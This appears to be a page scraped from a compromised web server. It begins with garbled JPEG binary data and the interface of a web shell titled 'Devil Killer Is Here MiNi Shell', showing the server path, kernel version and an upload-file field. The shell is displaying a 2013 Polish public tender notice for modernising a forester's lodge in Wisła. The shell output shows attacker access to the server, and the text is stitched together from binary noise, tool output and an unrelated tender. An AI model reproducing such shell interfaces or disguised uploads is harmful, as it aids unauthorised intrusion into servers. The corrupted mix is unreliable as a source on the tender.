JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130605/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130605/215676-N-2013.html

<p class="kh_header"><b>Wisła: Modernizacja Leśniczówki Przysłup Wisła ul. Cz. Wisełka 1a</b><br>
<b>Numer ogłoszenia: 215676 - 2013; data zamieszczenia: 05.06.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Państwowe Gospodarstwo Leśne Lasy Państwowe Nadleśnictwo Wisła , ul. Czarne 6, 43-460 Wisła, woj. śląskie, tel. 33 8552426, faks 33 8551160.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.lasy.gov.pl/pl/bip/dg/rdlp_katowice/nadl_wisla/zamowienia_publiczne</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowe Gospodarstwo Leśne Lasy Państwowe.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Modernizacja Leśniczówki Przysłup Wisła ul. Cz. Wisełka 1a.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 4.1 Przedmiotem zamówienia jest wykonanie robót budowlanych pt. Modernizacja Leśniczówki Przysłup Wisła ul. Cz. Wisełka 1a, zgodnie z  uproszczoną dokumentacją  projektową w zakresie umożliwiającym osiągnięcie założonych celów.
4.2 W zakres zamówienia pt. Modernizacja Leśniczówki Przysłup Wisła ul. Cz. Wisełka 1a. wchodzą następujące zadania:
a. modernizacja leśniczówki, 
b. modernizacja nawierzchni placu  i drogi dojazdowej  oraz odwodnienia, 
4.3  Modernizacja leśniczówki polega na:   
a. Roboty rozbiórkowe:                                                                                               - wykuciu z muru ościeżnic drzwiowych drewnianych,
- rozebraniu ścianek przegrodowych z cegły,
- wykuciu otworów ścianie o grubości ponad 1(2 cegły na otwory drzwiowe,
- wykuciu otworów na drzwi w ściankach przegrodowych o grubości 1(2 cegły,
- rozebraniu boazerii ze ściany z odzyskaniem listew wraz z rozebraniem rusztu,
- rozebraniu posadzek z mozaiki i paneli,
- rozebraniu posadzek z płytek ceramicznych na zaprawie cementowej,
- rozebraniu podłoży betonowych,
- rozebraniu wykładziny ściennej z płytek ceramicznych,
b. Roboty budowlane wykończeniowe:
- uzupełnieniu ścianek przegrodowych z cegły dziurawki oraz zamurowanie otworów,
- wykonaniu nadproży betonowych oraz  wykonanie nadproży z belek typu L,
- wykonaniu stropu podwieszonego z płyt g-k na ruszcie metalowym,
c. Tynki i oblicowania ścian:
- wykonaniu tynków na ścianach  nowych i pod oblicowanie ścian płytkami, 
  ceramicznymi  oraz uzupełnieniu tynków na ścianach  istniejących,
- przygotowaniu podłoża na ścianach i sufitach pod gładzie gipsowe,
- zagruntowaniu powierzchni ścian i sufitów emulsją gruntującą,
- wykonaniu gładzi gipsowej dwuwarstwowej na ścianach i sufitach,
- wykonaniu oblicowania ścian w kuchni i sanitariatach płytkami ceramicznymi na 
   zaprawie klejowej
- odgrzybieniu ścian w piwnicy po skuciu tynku  środkiem  Izomerem,
- uzupełnieniu tynku w piwnicach na ścianach i sufitach.
d. Stolarka okienna i drzwiowa wewnętrzna i zewnętrzna:
- osadzeniu okien z tworzywa w pomieszczeniach piwnicznych oraz w budynku 
   gospodarczym, okna wykonać w kolorystyce okien już istniejących, 
- osadzeniu okna dachowego w połaci dachu,
- osadzeniu dwóch schodów ściąganych w stropie nad poddaszem,
- osadzeniu drzwi wewnętrznych w pomieszczeniach mieszkalnych kompletnych 
   systemu np. Porta z ościeżnicami regulowanymi do ścian przegrodowych  6-25
   cm, kolorystykę drzwi uzgodnić z Zamawiającym,
- osadzeniu drzwi kompletnych z ościeżnicą metalową w pomieszczeniach piwnicy,
- osadzeniu kompletnych drzwi stalowych  odpornych na warunki  atmosferyczne  
   model JC-A65-E do budynku gospodarczego  oraz do piwnicy do kotłowni i składu 
   opału,
- osadzeniu klapy wsypowej stalowej ocieplonej do składu opału,
e. Izolacje przeciwwilgociowe oraz termiczne:
- wykonaniu izolacji przeciwwilgociowej z papy termozgrzewalnej w łazienkach i kuchni,
- wykonaniu izolacji cieplnej z płyt z wełny mineralnej grubości 16 cm na sufitach poddasza pomiędzy krokwiami, oraz od poddasza budynku gospodarczego,
- wykonaniu ekranu z folii paroszczelnej na sufitach poddasza,
f. Podłogi i posadzki:
- wykonaniu podłoża z zaprawy cementowej  grubości 5 cm zbrojonego siatką
   stalową  pod posadzki w kuchni i sanitariatach,
- zagruntowaniu podłoży emulsją gruntującą,
- wykonaniu warstwy wyrównawczej  pod posadzki z zaprawy wyrównawczej 
  o grubości 1 cm w pomieszczeniach na parterze i poddaszu,
- wykonaniu posadzki z płytek ceramicznych w pomieszczeniach kuchni, wejściach
   oraz sanitariatów, kolor płytek uzgodnić z Zamawiającym,
- wykonaniu cokolika z płytek w pomieszczeniu kuchni i wejściach o wysokości 
  10 cm (cięte z płytek posadzkowych),
- wykonaniu podłogi z paneli podłogowych o ścieralności A-4 wraz z ułożenim pianki 
   pod panele, 
- zabetonowaniu bruzd w podłożu w piwnicach wraz z zatarciem na gładko packą 
   stalową
g. Malowanie pomieszczeń:
- przygotowaniu starych tynków pod malowanie  emulsyjne,
- zagruntowaniu powierzchni ścian i sufitów emulsją gruntującą przed malowaniem,
- wykonaniu gładzi gipsowej na ścianach i sufitach w pomieszczeniach na parterze i 
  poddaszu, 
- malowaniu ścian i sufitów farbą emulsyjną Akrylową  dwukrotnie (kolorystykę 
    malowania uzgodnić z Zamawiającym),
- dwukrotnym malowaniu ścian i sufitów w pomieszczeniach w piwnicy  farbą
   emulsyjną, 
h. Wymiana instalacji wod-kan:
- demontażu istniejących rur stalowych ocynkowanych,
- demontażu urządzeń sanitarnych,
- demontażu baterii umywalkowych, zlewozmywakowych , wannowych,
- demontażu  podejść odpływowych z rur PCW 50-110 mm,
- wykuciu bruzd w ścianach oraz przekuć przez stropy do montażu rurociągów,
- montażu rurociągów z rur z  PPH  do wody zimnej oraz z rur Stabi do c w u,
- montażu rurociągów z rur PCW do kanalizacji sanitarnej ,
- wykonaniu izolacji rur w ścianie otulinami izolacyjnymi o grubości 6 mm,
- montażu umywalek na baterie stojące ,
- montażu ustępów na elemencie montażowym, Gebert ze spłuczkami  
  podtynkowymi,
- montażu wanny kąpielowej wraz z obudowaniem,
- montażu kabiny natryskowej narożnej półokrągłej wraz z brodzikami niskimi,
- montażu baterii umywalkowych, wannowych, zlewozmywakowych z długą
  wylewką, natryskowych ,
- montażu zaworów kulowych  do wody ciepłej i zimnej w instalacji z tworzyw 
   sztucznych,
i. Wymiana instalacji centralnego ogrzewania:
- demontażu rurociągów stalowych łączonych na spaw,
- demontażu grzejników stalowych płytowych z odzyskiem  grzejników (płytowych 
   podwójnych z dwoma konwektorami),
- wykonaniu instalacji c o z rur miedzianych łączonych na lut,  przy przejściu przez 
   stropy należy założyć tuleje ochronne,
- wykonaniu podejść pod piony z rur miedzianych,
- montażu zaworów kulowych mosiężnych pod pionami,
- montażu grzejników płytowych z dwoma konwektorami,
- montażu zaworów termostatycznych z głowicami na zasilaniu,
- montaż zaworów grzejnikowych na powrocie,
- zamontowaniu naczynia wzbiorczego przeponowego,
- montażu pompy obiegowej do instalacji co wraz z podejściami i zaworami
   kulowymi,
- wykonaniu próby szczelności instalacji na zimno,
- wykonaniu próby szczelności instalacji co na gorąco wraz z dokonaniem  regulacji,
- wykonaniu przebić przez stropy i ściany dla przeprowadzenia rurociągów instalacji,
j. Wymiana instalacji gazowej:
- demontażu rurociągu gazowego łączonego na spaw,
- demontażu urządzeń gazowych, pieca gazowego wieloczerpalnego, kuchni
   gazowej czteropalnikowej oraz kotła gazowego,
- wymianie odcinka  rurociągu gazowego,
- zamontowaniu podgrzewacza gazowego ciepłej wody użytkowej o poj. 150 dm3,
- montażu kuchni gazowej czteropalnikowej wraz z piekarnikiem,
- wykonaniu próby szczelności instalacji gazowej,
k. Wymiana instalacji elektrycznej:
- demontażu przewodów kabelkowych podtynkowych,
- demontażu gniazd wtyczkowych,
- demontażu wyłączników instalacji podtynkowej,
- demontażu opraw żarowych i świetlówek,
- demontażu tablic bezpiecznikowych,
- wykuciu bruzd w tynku oraz przebić przez ściany  dla ułożenia przewodów 
   podtynkowych,
- przygotowaniu podłoża pod montaż osprzętu oświetleniowego,
- montażu puszek podtynkowych,
- zaprawieniu bruzd w tynku po ułożeniu przewodów kabelkowych,
- montażu łączników instalacyjnych podtynkowych,
- montażu gniazdek instalacyjnych podtynkowych ze stykiem ochronnym,
- montażu gniazdek wtyczkowych ze stykiem  2 biegunowe przykręcane o
  obciążeniu 16 A,
- montażu gniazda instalacyjnego wtyczkowe ze stykiem ochronnym, wodoszczelne 
  trzybiegunowe o obciążeniu 16 A,
- montażu opraw świetlówek  przykręcanych,
- montażu opraw żarowych przykręcanych z kloszem porcelanowym,
- montażu tablic bezpiecznikowych kompletnych z wyłącznikiem przeciwporażeniowym,
- wykonaniu pomiaru  instalacji ,
l. Elewacja oraz roboty zewnętrzne  na budynku:
- przygotowaniu podłoża pod malowanie elewacji oraz malowanie elewacji,
- przygotowaniu podłoża  pod ocieplenie ścian zewnętrznych na cokole piwnic,
- przyklejeniu styropianu grubości 8 cm na ścianach piwnic,
- gruntowaniu powierzchni ścian na budynku gospodarczym,
- przyklejeniu siatki na styropianie oraz na ścianach budynku gospodarczego,
- nałożeniu na ścianach podkładowej masy tynkarskiej,
- wykonaniu tynku akrylowego na ścianach budynku gospodarczego,
- wykonaniu tynku mozaikowego żywicznego o uziarnieniu 2 mm na cokole,
- wymianie podokienników z blachy ocynkowanej powlekanej ,
- pomalowaniu deskowania  podbicia okapów oraz końcówek krokwi i belek
  środkiem grzybobójczym (Drewnochron) w kolorze palisander lub uzgodnić z Zamawiającym,
ł. Remont schodów zewnętrznych:
- rozebraniu okładziny schodowej z płyt lastrykowych wraz z podestem,
- rozebraniu balustrady drewnianej schodowej na słupkach metalowych,
- naprawie stopni schodowych, zabetonowaniu schodów od ściany,
- wykonaniu nakładki na stopnie z płyt kamiennych granitowych grubości 3 cm    
  wykończonych promieniowaniem, podstopnice wykończyć płytą kamienną
  granitową grubości 2 cm,
- ułożeniu na podeście na ścianach cokolika z płytek kamiennych granitowych o
   wys. 10cm,
-  wykonaniu balustrady na schodach zewnętrznych z elementów drewnianych 
   osadzonych na słupkach stalowych z profilu zamkniętego 6x6 cm zamocowanych
  do czoła policzka schodów lub od spodu do biegu schodowego, słupki stalowe
   należy ocynkować a następnie pomalować w kolorze elementów drewnianych
    balustrady,(balustradę wykonać wg stanu obecnego),
m. Malowanie dachu na budynku leśniczówki i budynku gospodarczym:
- oczyszczeniu pokrycia z blachy trapezowej poprzez  zmycie całości wodą
  pod ciśnieniem z dodatkiem detergentów
- oczyszczeniu szczotkami ręcznymi powierzchni blachy z rdzy,
- odtłuszczeniu całości blach na pokryciu przeznaczonym do malowania,
- malowaniu powierzchni blachy farbą  poliwinylową przeciw rdzewną chromianową 
   reaktywną  żółtą,
- malowaniu dwukrotnie pokrycia dachu z blachy  farbą poliwinylową chemoodporną,
- malowaniu rynien dachowych i rur spustowych farbą poliwinylową  dwukrotnie,
- wykonaniu naprawy pokrycia dachu z blachy na kominach i obróbek blacharskich
  na dachu,
- wymianie rynien dachowych z blachy ocynkowanej ,
- uzupełnieniu rur spustowych z blachy ocynkowanej
n. Odwodnienie budynku- drenaż opaskowy:
- rozebraniu istniejących betonów na podjeździe i przy budynku,
- odkopaniu  fundamentów do poziomu posadowienia ław fundamentowych  z 
  odłożeniem gruntu na odkład,
- oczyszczeniu i zmycie ścian piwnic,
- wykonaniu izolacji pionowej z jednej warstwy papy termozgrzewalnej z
   wykonaniem wyprawy  z zaprawy cementowej z dodatkiem środka
   wodoszczelnego,
- wykonaniu izolacji pionowej ze styropianu do izolacji fundamentów  na ścianach
   piwnic zagłębionych poniżej terenu,
- ułożeniu folii kubełkowej (Fundalina) na ścianach piwnic poniżej terenu,
- ułożeniu drenażu z rur perforowanych drenarskich z PCW o średnicy 125-150 mm,
- wykonaniu ekranu z żwirku filtracyjnego na ścianach o grubości 25 cm,
- zasypaniu wykopu ziemią złożoną na odkład warstwami co 30 cm wraz z ubiciem 
   ubijakami mechanicznymi,
- odwiezieniu nadmiaru ziemi powstałego po zasypaniu drenażu,
- wykonaniu wykopu pod odprowadzenie deszczówki od budynku i z drenażu,
- ułożeniu kanalizacji deszczowej z rur PCW 160-200 mm,
- obsypaniu rurociągu piaskiem kopanym o grubości 40 cm,
- zasypaniu rurociągu ziemią złożoną na odkład,
- odwiezieniu nadmiaru ziemi samochodami samowyładowczymi,
- wykonaniu studzienek systemu VAVIN  średnicy 315 mm na  drenażu na narożach
   budynku jako studnie rewizyjne,
- wykonaniu studzienki zbiorczej  drenażowej z kręgów betonowych,
- wykonaniu studzienki  chłonnej z kręgów betonowych średnicy 1000 mm,
- uporządkowaniu i doprowadzeniu do stanu pierwotnego terenu po wykonanym wykopie.
o. wymiana rurociągu wodociągu do budynku leśniczówki: 
- wykonaniu wykopu wzdłuż istniejących rur stalowych,
- wyrównaniu dna wykopu ręcznie,
- wykonaniu podsypki z piasku o grubości 10 cm pod ułożenie rur,
- ułożeniu rur z PE o średnicy 50 mm w wykopie,
- założeniu zasuw odcinających,
- wykonaniu próby szczelności ułożonego rurociągu PE,
- obsypaniu rurociągu piaskiem o grubości 15 cm,
- ułożeniu taśmy z folii z wkładką metalową oznaczającą trasę rurociągu,
- zasypaniu rurociągu ziemią złożoną na odkładzie  warstwami o grubości 30 cm z 
  zagęszczeniem ubijakami ręcznymi,
- plantowaniu  terenu po wykopie na szerokości 2,00 m,
4.4   Modernizacja nawierzchni placu i drogi dojazdowej  oraz odwodnienia polega na:
- rozebraniu podbudowy betonowej wzdłuż budynku,
- rozebraniu istniejących krawężników betonowych,
- wywiezieniu gruzu z rozbiórki  na odległość do 1 km,
- wykonaniu wykopu pod rurociąg o głębokości do 3,00 m,
- umocnieniu ścian wykopu balami drewnianymi,
- ułożeniu rur PCW średnicy 315x9.2 mm wraz z obsypaniem rur piaskiem,
- zasypaniu wykopu ziemią złożoną na odkładzie z zagęszczaniem zagęszczarką 
  mechaniczną warstwami co 30 cm, aż do osiągnięcia zgodnie z normą na
  placach i wjazdach,
- wykonaniu koryta pod podbudowę tłuczniową na placu i drodze dojazdowej
  o grubości do 40 cm wraz z od wozem  na odległość do 1 km,
- profilowaniu i zagęszczeniu podłoża pod warstwy konstrukcyjne nawierzchni 
  mechanicznie przy użyciu walca wibracyjnego,
- wykonaniu dolnej warstwy podbudowy z kruszywa kamiennego łamanego 31,5-63
   mm wraz z zagęszczeniem mechanicznym o grubości 25 cm po uwałowaniu,
- wykonaniu górnej warstwy podbudowy z kruszywa kamiennego łamanego 0-31.5
   mm o grubości 10 cm po uwałowaniu,
- wykonaniu rowków pod krawężniki  o wym. 30x40 cm,
- ustawieniu krawężników betonowych 15x30 cm na podsypce cementowo-piaskowej o stosunku 1-4  na ławie betonowej wraz z wykonaniem ławy betonowej z oporem,
- ułożeniu kostki brukowej betonowej w kolorze szarym o grubości 8 cm na podsypce cementowo-piaskowej w stosunku 1-4 , (prostokąt  lub podwójne  T), kształt uzgodnić z Zamawiającym,
- ułożeniu kostki brukowej betonowej kolorowej o grubości 8 cm na podsypce 
   cementowo-piaskowej w stosunku  1-4  (prostokąt  lub podwójne T), kształt
   kostki uzgodnić z Zamawiającym,
- ułożeniu obrzeży betonowych o wymiarach 8x30 cm na podsypce cementowo-
   piaskowej wraz z obetonowaniem wzdłuż ścian budynku gdzie od strony ogrodu,
- wykonaniu opaski  przy budynku z gotowego kruszywa - żwirek filtracyjny w
   kolorze białym 4-20 mm ,
- odkopaniu istniejących rur od zbiorników oczyszczalni, na długości 24 m
- wymianie rur rozsączających  z PCW średnicy 100 mm,
- obsypaniu wymienionych rur żwirem filtracyjnym o grubości 30 cm,
- zasypaniu, rurociągu ziemią złożoną na odkładzie.
4.5 Realizacja robót będzie się odbywała zgodnie z Harmonogramem Rzeczowo-
Finansowym opracowanym przez wybranego wykonawcę w uzgodnieniu z 
Zamawiającym i zatwierdzonym przez Zamawiającego przed podpisaniem umowy.
4.6.Szczegółowy opis przedmiotu zamówienia zawierają uproszczone dokumentacje projektowe składające się z: 
a. Projektu  uproszczonego, 
b. Trzech Specyfikacji Technicznej Wykonania i Odbioru Robót, 
c.  Dwóch przedmiarów robót. 
- łącznie stanowiące załącznik nr 7 do SIWZ..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.30.00.00-0, 45.40.00.00-0, 45.23.32.51-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 9.1.Zamawiający żąda od wykonawców wniesienia wadium w wysokości 9 000 złotych (słownie:  dziewięć tysięcy 00/100 złotych).
9.2.Wadium może być wnoszone w jednej lub kilku następujących formach:
a) pieniądzu;
b)poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
c) gwarancjach bankowych;
d) gwarancjach ubezpieczeniowych;
e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (t.j. Dz.U.2007.42.275 z późn. zm.).
9.3.Termin i sposób wniesienia wadium.
9.3.1.Wadium wnoszone w formie pieniądza należy wnieść na rachunek bankowy 
 PGL LP Nadleśnictwa Wisła  w  BGŻ S.A. Oddział Bielsko-Biała nr 34 2030 0045 
 1110 0000 0088 8110, 
9.3.2.Dokument potwierdzający wniesienie wadium w formie innej niż pieniądz należy złożyć w oryginale w Kasie PGL LP Nadleśnictwa Wisła, 43-460 Wisła,ul. Czarne 6.
9.3.3.Wadium wnosi się przed upływem terminu składania ofert. Wadium uznaje się za wniesione, jeżeli: 
9.3.3.1.wnoszone w formie pieniądza znalazło się na rachunku bankowym Zamawiającego przed upływem terminu na składanie ofert.
9.3.3.2.	wnoszone w pozostałych formach oryginały dokumentów zostały złożone w Kasie PGL LP Nadleśnictwa Wisła przed upływem terminu na składanie ofert.
9.4.Wymagania dotyczące wadium wnoszonego w formie innej niż pieniądz.
9.4.1.Wadium w formach wymienionych w art. 45 ust. 6 pkt. 2 - 5 Prawa zamówień publicznych musi być wystawione na PGL LP Nadleśnictwo Wisła.
9.4.3.Z treści poręczenia lub gwarancji winno wynikać bezwarunkowe zobowiązanie Gwaranta (poręczyciela) do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 4a i ust. 5 Prawa zamówień publicznych, na każde pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą. Gwarant nie może uzależniać dokonania zapłaty od spełnienia jakichkolwiek dodatkowych warunków lub wykonania czynności jak również od przedłożenia jakiejkolwiek dodatkowej dokumentacji.
9.5.Wadium wniesione przez jednego z Wykonawców wspólnie ubiegających się o zamówienie uważa się za wniesione prawidłowo.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>6.1.1.Posiadają uprawnienia do wykonywania określonej działalności lub czynności jeżeli przepisy prawa nakładają obowiązek ich posiadania.
W tym zakresie Zamawiający nie stawia żadnych warunków.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>6.1.2.Posiadają wiedzę i doświadczenie niezbędne do wykonania zamówienia.
W tym zakresie Zamawiający wymaga, aby Wykonawca:
wykonał w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 2 (dwa) zamówienia o wartości, co najmniej 300 000 złotych brutto każde, polegające na robotach budowlanych w zakresie budowy, modernizacji, remontu lub przebudowy budynku mieszkalnego wraz z otoczeniem.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W tym zakresie Zamawiający nie stawia zadnych warunków.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>6.1.3.Dysponują osobami zdolnymi do wykonania zamówienia.
W tym zakresie Zamawiający wymaga, aby Wykonawca dysponował: 
co najmniej 1 osobą posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności  konstrukcyjno budowlanej bez ograniczeń, o których mowa w Prawie budowlanym lub odpowiadające im uprawnienia budowlane uzyskane na podstawie wcześniej obowiązujących przepisów.
UWAGA :
Zamawiający określa wymogi dla każdej osoby w zakresie posiadanych uprawnień budowlanych, stosownie do wymogów określonych w Prawie budowlanym, dopuszcza odpowiadające im uprawnienia wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art. 12a oraz innych przepisów Prawa budowlanego oraz ustawy z dnia 18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz.U.2008.63.394).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>6.1.4.Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia. 
W tym zakresie Zamawiający wymaga, aby Wykonawca:
6.1.4.1.Posiadał środki finansowe lub zdolność kredytową nie mniejszą niż 300.000,00 złotych 
6.1.4.2.Posiadał ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia na kwotę nie mniejszą niż  300.000,00 złotych.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
